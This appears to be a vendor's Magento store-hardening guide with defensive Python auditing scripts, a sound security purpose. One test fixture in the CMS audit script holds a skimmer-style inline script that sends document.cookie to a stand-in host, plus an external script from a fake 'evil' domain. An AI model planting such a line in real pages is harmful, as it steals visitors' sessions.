Protecting Your Adobe Commerce / Magento Store in 2024

In a world where threats are always changing, your Adobe Commerce / Magento store needs to be protected. Security isn’t just about checking a few boxes - it’s a multi-layered approach that covers all aspects of your site from backend access control to customer data protection. In this guide we’ll go through the detailed, actionable steps to help you harden your Adobe Commerce / Magento store in 2024, with practical advice on everything from regular updates to advanced Cloudflare and Sucuri configurations.

Oh, and if you need any help, our Adobe Commerce / Magento support services will help you keep your store up to date and complete all of the recommendations mentioned in this guide!


1. Regular Maintenance and Updates

Keeping up to date with Adobe Commerce / Magento updates and security patches is the foundation of keeping your store secure. Updates often include patches for recently discovered vulnerabilities, and newer versions of the platform may include additional security features and performance improvements.

Install All Security Patches ASAP

Adobe releases security patches regularly to address newly discovered vulnerabilities, and attackers start scanning for unpatched stores as soon as a fix is public, so every day a patch sits unapplied is a day of avoidable exposure. Subscribe to Adobe's Security Center and security bulletin notifications so you hear about new patches immediately, and where you can, use automated patching tools to apply them quickly and consistently. Assign someone on your team to own patch monitoring so nothing gets missed and your store is not left exposed for longer than necessary.

Upgrade to the Latest Adobe Commerce Version

Beyond patches, upgrading to the latest Adobe Commerce / Magento version gives you access to new security features and functionality. Adobe includes new security mechanisms, performance improvements and bug fixes in new versions so upgrading regularly is a must. We recommend testing any new version in a staging environment first to ensure compatibility with custom extensions and themes. Also have a backup plan in place to roll back to a previous version if needed to avoid downtime during the upgrade.

Use the Magento Security Scan Tool

Adobe provides the free Magento Security Scan Tool, which checks your store against more than 30 known security risks, from malware signatures and unsecured ports to outdated extensions and missing security patches. Schedule scans at least monthly, and ideally after any major change to your site. The report lists each finding with remediation advice so you can fix issues before they are exploited.


2. Access Control and Authentication

The backend of your Adobe Commerce / Magento store is the first target for attackers so managing who can access it is key. Implementing strict access control minimises the risk of unauthorised access and keeps your store secure.

Enable Two-Factor Authentication (2FA)

Two-factor authentication (2FA) requires a second proof of identity after the password, typically a time-based code from an authenticator app or a hardware security key. It protects the admin panel even when a password has been phished, guessed or leaked in a breach. Adobe Commerce / Magento has 2FA built in, and since version 2.4 it is enabled and required for all admin users by default: do not disable it, and make sure every admin account, especially those with high-level permissions, has enrolled a second factor.

Implement Role-Based Access Control (RBAC)

RBAC is a powerful security feature as it limits user permissions based on their role. For example your content team may only need access to product and content management areas while the finance team only needs access to payment and transaction details. Adobe Commerce / Magento allows you to create custom roles and permissions so users can only access what they need. RBAC not only improves security but also minimises the risk of accidental changes as only authorised users can change sensitive settings.

Use Strong, Unique Passwords

Weak or reused passwords are one of the most common ways admin accounts are compromised. Enforce a strong, unique password policy across your store, requiring a mix of uppercase letters, lowercase letters, numbers and special characters, and reject passwords that have been used before. Rotate passwords on a schedule and immediately whenever a compromise is suspected, so an old leaked password can no longer be used by an attacker. A password manager makes it practical to generate and store a complex, unique password for every account.

Restrict Admin Access with IP Whitelisting

If possible limit backend access to a list of approved IP addresses. This feature is called IP whitelisting and will block any login attempt from an unauthorised IP address. IP whitelisting works well if your team works from specific, static locations like an office or a secure VPN. Implementing this feature will ensure only trusted networks can reach the backend and prevent attackers from accessing it from unapproved sources.


3. Data Encryption and Security Settings

Data encryption and proper security settings protect sensitive information whether it’s stored on your server or in transit. Encryption makes data unreadable so it’s harder for hackers to access.

Enforce SSL/TLS Site-Wide

TLS (Transport Layer Security), the successor to the now-deprecated SSL (Secure Sockets Layer), encrypts the data exchanged between your store and your customers across every interaction: browsing, registration, login and checkout. Enforce HTTPS site-wide, redirect all HTTP requests to HTTPS, disable SSL and early TLS (1.0 and 1.1) and use TLS 1.2 or later, which is also what PCI DSS requires for card-holder data in transit. Search engines treat HTTPS as a ranking signal too. Enforcing TLS across the whole site, not just the checkout, keeps customer data private in transit and stops session cookies leaking over plain HTTP.

Enable Content Security Policy (CSP)

Content Security Policy (CSP) is a response header that restricts where your pages may load scripts, styles, images and other resources from. By allowing only trusted origins it stops injected scripts from untrusted domains from running, which makes it a core defence against cross-site scripting (XSS) and the skimmer injections behind Magecart-style attacks. Adobe Commerce / Magento ships with CSP support: allowed origins are declared per module in csp_whitelist.xml, and the header is sent in report-only mode by default, which logs violations but blocks nothing. Review the violation reports, whitelist the origins you genuinely use, then switch to restrict mode so the policy is actually enforced.

Use Secure Cookies

Cookies carry session identifiers and login state. Set the Secure flag so a cookie is only ever sent over HTTPS, and the HttpOnly flag so it cannot be read by JavaScript, which means an XSS bug cannot simply lift the session. Add a SameSite attribute (Lax or Strict) so the cookie is not attached to cross-site requests. Together these reduce the risk of session hijacking, where an attacker gains access by stealing a valid session cookie. In Adobe Commerce / Magento the HttpOnly setting lives under Stores > Configuration > General > Web > Default Cookie Settings, and the Secure flag follows from enforcing HTTPS on the storefront and admin.
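The three settings above (TLS, CSP and cookie flags) are all visible in a single HTTP response, so they can be checked in one pass. The script below is an added example, not code from the original page: it audits a list of response headers and reports every missing protection, run here against two constructed responses (the cookie names and CDN origin are illustrative). The "weak" response is what a default store typically sends, including Magento's report-only CSP, which the audit flags as unenforced.

```python
"""Check one HTTP response for the transport and cookie hardening described above.

Added example (not code from the original page). The two responses are
constructed samples; the cookie names and origins are illustrative.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    header: str
    problem: str


def audit_headers(headers):
    """Return a Finding for every weakness in a list of (name, value) pairs.

    A list is used rather than a dict so that repeated Set-Cookie headers
    are all inspected instead of being silently collapsed into one.
    """
    findings = []
    names = {name.lower() for name, _ in headers}

    if "strict-transport-security" not in names:
        findings.append(Finding("Strict-Transport-Security",
                                "missing: browsers may still follow plain-HTTP links to the store"))

    enforced = "content-security-policy" in names
    report_only = "content-security-policy-report-only" in names
    if not enforced and not report_only:
        findings.append(Finding("Content-Security-Policy", "missing"))
    elif report_only and not enforced:
        # Magento's default: violations are reported, nothing is blocked.
        findings.append(Finding("Content-Security-Policy",
                                "report-only mode: the policy is not enforced"))

    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "secure" not in attrs:
            findings.append(Finding("Set-Cookie", f"{cookie}: no Secure flag, can be sent over plain HTTP"))
        if "httponly" not in attrs:
            findings.append(Finding("Set-Cookie", f"{cookie}: no HttpOnly flag, readable by injected JavaScript"))
        if "samesite" not in attrs:
            findings.append(Finding("Set-Cookie", f"{cookie}: no SameSite attribute, sent on cross-site requests"))
    return findings


# Constructed sample: a store before hardening.
WEAK_RESPONSE = [
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Content-Security-Policy-Report-Only", "default-src 'self'"),
    ("Set-Cookie", "PHPSESSID=c0ffee; Path=/"),
    ("Set-Cookie", "admin=deadbeef; Path=/admin; HttpOnly"),
]

# Constructed sample: the same store after the fixes.
HARDENED_RESPONSE = [
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Content-Security-Policy", "default-src 'self'; script-src 'self' https://js.example-cdn.com"),
    ("Set-Cookie", "PHPSESSID=c0ffee; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Set-Cookie", "admin=deadbeef; Path=/admin; Secure; HttpOnly; SameSite=Strict"),
]

if __name__ == "__main__":
    for label, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"{label}: {len(audit_headers(response))} finding(s)")
        for f in audit_headers(response):
            print(f"  {f.header}: {f.problem}")
```

To use it against a live store, capture the headers of a logged-in storefront page and of the admin login page (each sets its own session cookie) and pass them in as pairs; a store that passes on the home page can still fail on the admin path.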


4. Cloudflare Pro Plan + Configuration

Adding Cloudflare services to your Adobe Commerce / Magento store will give you extra security protection against bots, malicious traffic and other threats. Here’s how to configure Cloudflare for maximum protection.

Configure High Security Level

Cloudflare’s Security Level controls how aggressively visitors are challenged based on the reputation of their IP address. Setting it to “High” challenges any visitor whose address has recently shown malicious behaviour, which cuts down the bot traffic, spam and automated brute-force attempts that eCommerce sites attract. It challenges rather than blocks, so a legitimate shopper on a poorly reputed network can still get through, but watch your analytics for an unexpected drop in conversions after changing it.

Consider Country-Based Blocking or Managed Challenges

If your store doesn’t do business in certain high-risk regions (e.g. China, Hong Kong, Russia, Ukraine, North Korea, Turkey and Poland) consider blocking, or better, applying managed challenges to visitors from those areas. A managed challenge asks the visitor to pass a check that a real browser usually completes automatically, falling back to a CAPTCHA-like step only when needed, so it filters out automated attacks without turning away legitimate shoppers. An outright country block is simpler but also blocks genuine customers and anyone travelling there, so prefer challenges unless you never ship to a region.

Enable Page Shield

Page Shield is a client-side security feature that protects against JavaScript-based attacks like form-jacking and Magecart attacks. These attacks target customer data by injecting malicious scripts into pages, often going undetected until data is compromised. With Page Shield enabled Cloudflare can detect suspicious JavaScript activity and alert you if any issues arise, which will help protect customer data.

Enable Managed Rules

Cloudflare’s WAF managed rulesets (available on the Pro plan and above) automatically block common web attacks such as SQL injection, cross-site scripting and the other OWASP Top 10 categories. Cloudflare updates the rules as new exploits appear, so you get protection against emerging threats with minimal configuration. They are a must for eCommerce sites, especially those handling large volumes of customer data; after enabling them, review the WAF event log for a few days to catch false positives on checkout or admin actions before tightening further.

IP Whitelist for Admin URLs

Restricting the admin URL to approved IP addresses at the Cloudflare edge, using a WAF custom rule that blocks requests to the admin path unless the source IP is on your allow list, stops brute-force attempts before they ever reach your server. Bear in mind that this only holds if the origin accepts web traffic from Cloudflare alone: if the origin is reachable directly, an attacker who discovers its IP address bypasses the rule entirely, so pair it with the origin firewall restriction described later in this guide.


5. Sucuri Scanning

Sucuri’s suite of tools for monitoring, detecting and protecting against threats is a must have for your Adobe Commerce / Magento security.

Set Up Regular Security Scans

Sucuri’s security tools detect malware, vulnerabilities and other risks that can compromise your store. Schedule regular scans, ideally weekly and after every major site update, so you can identify and fix issues before they become security incidents.

Enable Server-Side Scanning

While standard scans will scan the visible part of your site, server-side scans will scan the deeper parts of your site. Server-side scanning is essential to detect issues that are not visible on the front end like backdoor scripts or unauthorised files. Configuring Sucuri for server-side scanning will give you full site monitoring so threats will be detected at every level.

Set Up Alerts for Security Incidents

Sucuri has real-time alerts that will notify you immediately if threats or security incidents are detected. Alerts will allow you to respond quickly and minimise damage before threats escalate. Alerts can be configured to notify you through email, SMS or integrated notification systems so you’ll be informed of security status changes as they happen.

Review and Patch Vulnerabilities ASAP

When Sucuri detects vulnerabilities you need to address them as soon as possible. Sucuri’s reports will provide detailed information on each issue including step by step remediation. Review these reports regularly and apply the recommended fixes to keep your store secure and prevent vulnerabilities from being exploited.


6. Secure Backend and Server Environment

The backend and server environment is the heart of your Adobe Commerce / Magento store. Securing these areas is a must.

Change Default Admin Path

Changing the default admin URL path (the “admin” frontname, set with the setup:config:set command’s backend-frontname option and stored in app/etc/env.php) is a cheap way to cut noise. Automated scanners and credential-stuffing bots hammer /admin by default, so a custom path takes your store out of that dragnet. Treat it as a reduction in noise rather than a real control: the path can still be discovered, so it must sit alongside 2FA, IP restrictions and strong passwords rather than replace them.

Set Correct File Permissions

Correct file permissions limit what a compromised web process, or another user on the same host, can read or change. The web server user should be able to write only to var, generated, pub/media and pub/static; application code and configuration should be writable by the deploy user alone. app/etc/env.php holds your database credentials and the encryption key, so it must never be world-readable, and nothing should be world-writable. Follow the principle of least privilege so each OS user has only the access its role requires.
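A permissions audit is quick to automate, and the same pass can catch a related post-compromise sign: PHP files dropped into pub/media, a favourite place for web shells because it is writable by the web server. The script below is an added example, not code from the original page. It builds a throwaway directory mimicking the relevant parts of a Magento install (so it runs anywhere without touching a real store), audits it, applies the permission scheme described above, and audits again; the assumptions are that env.php holds the secrets, that the four trees listed are the only ones the web server group should write to, and that PHP files have no business inside pub/media.

```python
"""Audit the permission hygiene of a Magento root, then fix the fixable findings.

Added example, not from the original page. Assumptions: app/etc/env.php holds the
database credentials and crypt key; var, generated, pub/media and pub/static are
the only trees the web server group should write to; PHP files do not belong in
pub/media. The sample tree built by build_sample_tree() is constructed.
"""
import os
import shutil
import stat
import tempfile
from pathlib import Path

SECRET_FILE = "app/etc/env.php"
WRITABLE_TREES = ("var", "generated", "pub/media", "pub/static")


def audit(root: Path) -> list:
    """Return human-readable findings, one per problem, in path order."""
    findings = []
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root).as_posix()
        mode = path.stat().st_mode
        if mode & stat.S_IWOTH:
            findings.append(f"{rel}: world-writable")
        if rel == SECRET_FILE and mode & stat.S_IROTH:
            findings.append(f"{rel}: world-readable (contains DB credentials and crypt key)")
        if rel.startswith("pub/media/") and path.suffix.lower() in (".php", ".phtml"):
            findings.append(f"{rel}: PHP file in media directory (possible web shell)")
    return findings


def harden(root: Path) -> None:
    """Apply the permission scheme. Deliberately deletes nothing: a suspect
    file in pub/media needs investigating, not silently removing."""
    os.chmod(root / SECRET_FILE, 0o660)           # owner + web server group only
    for tree in WRITABLE_TREES:
        top = root / tree
        for p in [top, *top.rglob("*")]:
            if p.is_dir():
                os.chmod(p, 0o2775)               # group-writable, setgid so new files inherit the group
            else:
                os.chmod(p, 0o664)


def build_sample_tree(root: Path) -> None:
    """Constructed layout with three deliberate problems."""
    for d in ("app/etc", "var/log", "generated", "pub/media/wysiwyg", "pub/static", "vendor"):
        (root / d).mkdir(parents=True)
    (root / SECRET_FILE).write_text("<?php return ['db' => ['password' => 'not-a-real-secret']];")
    (root / "pub/media/wysiwyg/hero.jpg").write_bytes(b"\xff\xd8\xff")
    (root / "pub/media/wysiwyg/cache.php").write_text("<?php /* constructed stand-in for a dropped web shell */")
    for p in root.rglob("*"):                     # explicit baseline so the host umask does not matter
        os.chmod(p, 0o755 if p.is_dir() else 0o644)
    os.chmod(root / SECRET_FILE, 0o644)           # problem 1: anyone on the host can read the DB password
    os.chmod(root / "var/log", 0o777)             # problem 2: world-writable directory
    # problem 3: the .php file under pub/media, left for audit() to report


def demo():
    """Build the sample tree, audit it, harden it, audit again; returns both reports."""
    root = Path(tempfile.mkdtemp(prefix="magento-perms-"))
    try:
        build_sample_tree(root)
        before = audit(root)
        harden(root)
        after = audit(root)
    finally:
        shutil.rmtree(root)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", *before, sep="\n  ")
    print("after:", *after, sep="\n  ")
```

Point audit() at a real Magento root to get the same report for your store; the only finding that survives harden() in the demo is the PHP file in pub/media, which is the point: permissions can be fixed mechanically, a planted file cannot.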

Enable Logging and Monitoring

Log all backend logins and configuration changes so you have a complete record of activity and can spot suspicious behaviour early. Adobe Commerce includes an Admin Actions Log for this; on Magento Open Source, combine the web server access logs with the admin login records. Review the logs regularly for failed admin logins from unfamiliar addresses, logins at unusual hours and unexpected configuration changes. Ship them to a central location (Sucuri and most log management tools can ingest them) so an attacker who gains server access cannot simply delete the evidence, and set alerts on the patterns above.
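Of the patterns above, a burst of login attempts against the admin path is the easiest to detect from the access log alone. The script below is an added example, not code from the original page: it parses nginx “combined” format lines and flags any source IP that submits more than a threshold of POSTs to the admin path inside a sliding window. The log lines are constructed, and the admin path, threshold and window are assumptions to tune for your store.

```python
"""Flag admin login brute-forcing from the web server's access log.

Added example, not part of the original page. LOG_LINES are constructed
nginx 'combined' format lines; the admin path, the threshold and the window
are assumptions to tune for your store.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

ADMIN_PATH = "/secret_admin_8f3a/"        # assumed custom backend frontname
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status), or None if the line does not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def brute_force_sources(lines, threshold=5, window=timedelta(minutes=5)):
    """Map each source IP that exceeded `threshold` admin POSTs inside any
    `window` to the time it first crossed the line.

    POSTs are counted regardless of status code: a credential-stuffing run is a
    burst of form submissions whatever the server replies, and the login form
    is the only thing normally POSTed to the admin root by a logged-out client.
    """
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method != "POST" or not path.startswith(ADMIN_PATH):
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:      # slide the window forward
            q.popleft()
        if len(q) > threshold and ip not in flagged:
            flagged[ip] = ts
    return flagged


# Constructed sample log: one admin logging in normally, one shopper, one scripted client.
LEGIT = [
    '203.0.113.5 - - [12/Mar/2024:09:00:01 +0000] "GET /secret_admin_8f3a/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Mar/2024:09:00:09 +0000] "POST /secret_admin_8f3a/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [12/Mar/2024:09:02:00 +0000] "GET /catalog/category/view/id/5 HTTP/1.1" 200 8874 "-" "Mozilla/5.0"',
]
ATTACK = [
    f'198.51.100.23 - - [12/Mar/2024:09:01:{s:02d} +0000] "POST /secret_admin_8f3a/ HTTP/1.1" 302 0 "-" "python-requests/2.31"'
    for s in range(0, 14, 2)              # seven POSTs, two seconds apart
]
LOG_LINES = LEGIT[:2] + ATTACK + LEGIT[2:]

if __name__ == "__main__":
    for ip, when in brute_force_sources(LOG_LINES).items():
        print(f"{ip} exceeded the admin POST threshold at {when:%Y-%m-%d %H:%M:%S}")
```

One caveat if you sit behind Cloudflare: the first field of the access log is Cloudflare’s address unless nginx is configured to restore the real client IP from CF-Connecting-IP (the ngx_http_realip_module), so do that first or every source will look like the same handful of proxies.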

Server Updates and Patching

Keeping your server’s operating system and software up to date prevents exploitation of known vulnerabilities. Apply patches for critical services such as Nginx or Apache, MySQL/MariaDB, PHP, Elasticsearch/OpenSearch and Redis as soon as they are released, and keep PHP on a version that both your distribution and your Adobe Commerce / Magento release still support: an end-of-life PHP build receives no security fixes at all.

IP Restrict Core Services (SSH, MySQL, FTP etc.)

Limit access to core services by source IP so that only trusted networks can connect. SSH and MySQL should never be reachable from the open internet: bind MySQL to localhost or the private network, and restrict SSH to your office or VPN addresses with key-based authentication only. Replace plain FTP with SFTP, since FTP sends credentials and files in the clear. Combined with VPN access this reduces server access to a small, controlled group of users.

Restrict Port 80/443 Access to Cloudflare IP Ranges

Another powerful way to boost your Adobe Commerce / Magento store’s security is to limit direct access to your server’s web traffic. By configuring the server firewall to accept traffic on ports 80 (HTTP) and 443 (HTTPS) only from Cloudflare’s IP address ranges, you ensure every request passes through Cloudflare’s security filters first, so an attacker who finds your origin IP (through DNS history, certificate transparency logs or an old record) cannot simply bypass the WAF and the admin IP rules. Cloudflare publishes its ranges at cloudflare.com/ips and they change occasionally, so automate the refresh rather than pasting them in once.
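The two restrictions above (admin IP allow-listing at the edge and locking the origin to Cloudflare) depend on each other, and there is a third piece that is easy to get wrong: once traffic arrives via Cloudflare, the real visitor address is in the CF-Connecting-IP header, which an attacker hitting the origin directly can set to anything. The example below is added code, not from the original page, and shows all three together: it trusts the header only when the TCP peer is a Cloudflare address, applies the admin allow list to the resulting IP, and generates the nftables statements that restrict 80/443 to Cloudflare. CF_RANGES is a small constructed subset (refresh the real list from cloudflare.com/ips), and ADMIN_ALLOWLIST and ADMIN_PATH are assumed values.

```python
"""Decide which IP a request really came from, and lock the origin to Cloudflare.

Added example, not from the original page. CF_RANGES is a small constructed
subset: the authoritative list is published at https://www.cloudflare.com/ips/
and changes occasionally, so fetch it from there. ADMIN_ALLOWLIST and ADMIN_PATH
are assumed values.
"""
import ipaddress

CF_RANGES = [ipaddress.ip_network(n) for n in (
    "103.21.244.0/22", "173.245.48.0/20", "2400:cb00::/32",   # subset; refresh from cloudflare.com/ips
)]
ADMIN_ALLOWLIST = [ipaddress.ip_network(n) for n in (
    "203.0.113.0/24",     # office egress (assumed)
    "198.51.100.7/32",    # VPN exit address (assumed)
)]
ADMIN_PATH = "/secret_admin_8f3a/"   # assumed custom backend frontname


def in_any(ip: str, networks) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)   # a v4 address in a v6 network is simply False


def real_client_ip(remote_addr: str, headers: dict) -> str:
    """Trust CF-Connecting-IP only when the TCP peer is a Cloudflare address.

    Anyone who reaches the origin directly can put any value in that header,
    so an unconditional lookup would let them impersonate an allow-listed IP.
    """
    forwarded = headers.get("CF-Connecting-IP")
    if forwarded and in_any(remote_addr, CF_RANGES):
        return forwarded
    return remote_addr


def admin_request_allowed(path: str, remote_addr: str, headers: dict) -> bool:
    """Storefront paths are open; the admin path is limited to ADMIN_ALLOWLIST."""
    if not path.startswith(ADMIN_PATH):
        return True
    return in_any(real_client_ip(remote_addr, headers), ADMIN_ALLOWLIST)


def nft_origin_rules(ranges=CF_RANGES) -> list:
    """nftables statements that accept 80/443 only from `ranges` and drop the rest,
    so nothing reaches the store without passing Cloudflare's WAF first."""
    rules = []
    for net in ranges:
        family = "ip6" if net.version == 6 else "ip"
        rules.append(f"add rule inet filter input {family} saddr {net} tcp dport {{ 80, 443 }} accept")
    rules.append("add rule inet filter input tcp dport { 80, 443 } drop")
    return rules


if __name__ == "__main__":
    claimed = {"CF-Connecting-IP": "203.0.113.5"}          # an allow-listed office address
    print("via Cloudflare:       ", admin_request_allowed(ADMIN_PATH, "173.245.48.10", claimed))
    print("direct, header spoofed:", admin_request_allowed(ADMIN_PATH, "192.0.2.44", claimed))
    print("\n".join(nft_origin_rules()))
```

The same “only trust the header from a Cloudflare peer” rule is what nginx’s real_ip module implements with its set_real_ip_from directives; the Python version is here to make the failure mode explicit, since the second print line is exactly the bypass an attacker attempts when the origin is reachable directly.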

Keep Your Hosting Environment Clean

Audit your hosting environment regularly so that nothing is left on production, or even staging, that does not belong there: development tools, phpinfo and test scripts, exposed .git directories, database dumps and archived copies of the store inside the web root are all common finds. Any of these can hand an attacker credentials, source code or a complete copy of your store and customer data.

Audit Admin Users / CMS Content

More often than not, the first sign of a compromised Adobe Commerce / Magento store is the creation of new admin level users or modifications of CMS pages and blocks. Auditing admin users and CMS content regularly can help you identify any potential breach that may have occurred and subsequently block these bad actors from causing any further damage.
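Both of those checks can be scripted against the database rather than clicked through in the admin. The example below is added code, not from the original page: it runs against an in-memory SQLite copy of a subset of the columns of Magento’s admin_user and cms_block tables (column names as in a 2.4 schema; verify against yours) with constructed rows, reports active admin accounts that are not on your list of accounts created on purpose, and reports CMS blocks that load script or iframe content from hosts you have not approved or that embed inline script. KNOWN_ADMINS and ALLOWED_SCRIPT_HOSTS are assumed values for the demo store.

```python
"""Find the two commonest signs of a compromised store: admin accounts nobody
created on purpose, and CMS blocks that pull in or embed scripts.

Added example, not from the original page. The tables hold a subset of the
columns of Magento's admin_user and cms_block tables (assumed to match a 2.4
schema; verify against yours) with constructed rows.
"""
import re
import sqlite3
from urllib.parse import urlparse

KNOWN_ADMINS = {"alice", "bob"}                  # accounts you created deliberately (assumed)
ALLOWED_SCRIPT_HOSTS = {"js.example-cdn.com"}    # origins your CMS content may legitimately load (assumed)
SRC_RE = re.compile(r"<(?:script|iframe)\b[^>]*\ssrc=[\"']?([^\"'\s>]+)", re.I)
INLINE_SCRIPT_RE = re.compile(r"<script\b(?![^>]*\ssrc=)[^>]*>", re.I)


def load_sample():
    """Constructed data: two real admins plus one planted account, and one injected block."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE admin_user (user_id INTEGER, username TEXT, email TEXT, created TEXT, is_active INTEGER);
        CREATE TABLE cms_block (block_id INTEGER, identifier TEXT, content TEXT, update_time TEXT, is_active INTEGER);
        INSERT INTO admin_user VALUES
          (1, 'alice', 'alice@example.com', '2023-01-10 09:00:00', 1),
          (2, 'bob',   'bob@example.com',   '2023-02-14 10:00:00', 1),
          (3, 'support_tmp', 'x@mail.example.net', '2024-03-12 03:14:07', 1);
        INSERT INTO cms_block VALUES
          (1, 'footer_links', '<ul><li><a href="/about">About</a></li></ul>', '2023-06-01 12:00:00', 1),
          (2, 'promo_banner', '<div>Spring sale</div><script src="https://js.example-cdn.com/banner.js"></script>', '2024-02-20 08:00:00', 1),
          (3, 'checkout_note', '<p>Thanks</p><script src="https://cdn.evil-stats.example/collect.js"></script>', '2024-03-12 03:20:41', 1),
          (4, 'home_hero', '<div>Hi</div><script>new Image().src="https://x.example/?c="+document.cookie</script>', '2024-03-12 03:21:05', 1);
    """)
    return db


def unexpected_admins(db, known=KNOWN_ADMINS):
    """Active admin accounts that are not on the list of accounts you created."""
    rows = db.execute("SELECT user_id, username, email, created FROM admin_user "
                      "WHERE is_active = 1 ORDER BY created")
    return [row for row in rows if row[1] not in known]


def suspicious_blocks(db, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """CMS blocks that load script/iframe content from unknown hosts or embed inline script."""
    findings = []
    query = "SELECT block_id, identifier, content, update_time FROM cms_block ORDER BY block_id"
    for block_id, identifier, content, updated in db.execute(query):
        for src in SRC_RE.findall(content):
            host = urlparse(src).hostname or ""
            if host not in allowed_hosts:
                findings.append((block_id, identifier, updated, f"loads from {host or src}"))
        if INLINE_SCRIPT_RE.search(content):
            findings.append((block_id, identifier, updated, "inline <script>"))
    return findings


if __name__ == "__main__":
    db = load_sample()
    for user_id, username, email, created in unexpected_admins(db):
        print(f"unexpected admin #{user_id} {username} <{email}> created {created}")
    for block_id, identifier, updated, why in suspicious_blocks(db):
        print(f"block #{block_id} '{identifier}' modified {updated}: {why}")
```

Against a real store, point the two queries at your MySQL database (the cms_page table has the same content and update_time columns, so the block check applies there too) and run them on a schedule; the created and update_time columns tell you when the change landed, which is usually the first anchor for the rest of the investigation.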


7. Fraud and Transaction Security

Securing the transaction process is crucial for customer data and a trusted shopping environment.

Utilise CAPTCHAs and Honeypots

CAPTCHA stops simple bots from abusing the login, registration, password reset and checkout forms, cutting brute-force attempts and spam. Adobe Commerce / Magento supports Google reCAPTCHA out of the box for both admin and storefront forms; enable it at least on the admin login and on customer login, registration and password reset. CAPTCHA raises the cost of automation rather than eliminating it, so pair it with rate limiting at the edge.

Another effective tool for detecting and deterring bots and malicious users is the honeypot. Honeypots are hidden fields or sections on your site that genuine visitors won’t see or interact with, only bots and automated scripts are likely to stumble upon them. Placing honeypots on key areas, such as login, registration, or checkout pages, can give you a quick and simple way to spot suspicious activity and prevent unwanted access.

Use PCI Compliant Payment Methods

PCI DSS compliance is required of every merchant that accepts card payments. The simplest way to reduce your scope is to choose a payment integration that keeps card data off your servers entirely, using the provider’s hosted fields, iframe or tokenisation so the card number goes straight to the PCI-certified payment provider and never touches Adobe Commerce / Magento. This shrinks both your liability and your audit burden, and customers know their payment details are handled securely.

Fraud Detection Tools

Fraud detection tools will analyse transaction patterns to flag suspicious activity. Many fraud detection tools integrate with Adobe Commerce / Magento and can prevent costly chargebacks and protect your store’s bottom line. These tools will automatically flag suspicious behaviour like unusual order amounts or mismatched shipping and billing addresses so you can review orders before fulfilment.


8. Minimise Third Party Risks

Third-party extensions and services can add functionality to your store but may also introduce security risks.

Vet and Limit Extensions

Only install extensions from trusted, verified sources. Before installing an extension, research its reviews, update history and support options. Audit your extensions regularly and remove any that are unused or no longer maintained, as these are where vulnerabilities accumulate. Adobe Commerce Marketplace extensions go through a review process, but that review is not a penetration test, so additional due diligence is still required. Run composer audit after each deployment to check every installed package against published vulnerability advisories. Plus, for every module you remove, you’ll see a bit of a performance boost too.

Limit Third Party Access

Restrict third party vendor permissions to the specific areas they need. Regularly review and adjust permissions to ensure third parties don’t have access to sensitive data or critical functions they don’t need, reducing the risk of unauthorised access.


9. Backup and Disaster Recovery

Having a backup and disaster recovery plan is essential to get back up and running in case of an emergency.

Set Up Daily Backups

Daily backups ensure your data can be restored quickly after a breach, a ransomware attack or an operational mistake. Store them offsite or in a separate, access-controlled location, keep at least one copy that cannot be modified or deleted from the production environment, and encrypt them: a backup contains app/etc/env.php with your database credentials and encryption key as well as all customer data, so it needs the same protection as the live store.

Test Your Recovery Process

Regularly test your backup restore process to ensure data can be restored quickly and accurately. Testing will verify your backup system is working as expected so you’ll be ready to restore data quickly in an emergency.


10. Additional Security Measures

Proactive security measures keep your store resilient to emerging threats and keep your team alert.

Conduct Regular Security Audits

Schedule audits regularly, in-house or with a security professional. Our security audit services will identify vulnerabilities, misconfigurations and other potential risks to give you a full view of your store’s security posture and compliance to best practices.

Train Staff on Security

Train employees to recognize phishing, social engineering and other security threats. Educating staff will reduce human error and make your store less vulnerable to attacks that target employees directly.

Stay Up to Date with Security

Keep up with security news, Adobe bulletins and industry trends to stay ahead of the curve. Staying up to date will allow you to adapt your security strategy to new risks and keep your store secure over time.


That's It! Let's Review...

By following these steps and using tools such as Cloudflare and Sucuri, Adobe Commerce / Magento store owners can build a multi-layered security strategy that protects the business and its customers. Security is a continuous process and being proactive will keep your store secure, trusted and ready for growth in a constantly changing digital world.

No website is completely infallible, but by applying these best practices and modern tools consistently you will be far better placed when facing those pesky attackers.

Would you like to chat about keeping your Adobe Commerce / Magento store secure? Please get in touch as we would love to hear from you!
